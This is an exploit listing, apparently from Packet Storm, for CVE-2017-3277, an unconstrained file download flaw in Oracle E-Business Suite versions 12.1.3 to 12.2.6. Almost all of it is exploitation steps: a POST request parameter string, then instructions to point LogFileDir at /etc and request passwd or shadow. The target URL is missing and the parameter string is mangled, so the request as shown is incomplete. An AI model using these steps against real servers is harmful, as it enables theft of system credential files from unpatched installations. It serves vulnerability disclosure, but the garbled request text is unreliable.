Oracle E-Business Suite 12.x Unconstrainted File Download

Type packetstorm
Reporter Owais Mehtab
Modified 2017-01-22T00:00:00


                                            `# Exploit Title: [Unconstrained File Download - Oracle E-Business Suite]  
# Exploit Discoverer: [Owais Mehtab, Tayeeb Rana]  
# Vendor Homepage: []  
# Version: [12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6]  
# CVE: 2017-3277  
[Attack Vectors]  
exploitation may be done by sending a post request to following url$programRunId=8548$sessionId=231730$page*_session*_id=231730$utilityFlag=Completed$startDate=1472726192000$taskName=AutoPatch_20-_20u21444745.drv$lastUpdate=1472726297000$status=Completed$taskid=231730$taskId=231730$totalRunTime=1_20min,_2045_20sec$utilityName=adpatch$target=FINchange  
Change the following in post request:-  
1-The LogFileDir parameter to any system directory (e.g., /etc)  
2-The LogFileList:key:1 parameter value to the file name that needs to be downloaded (passwd or shadow)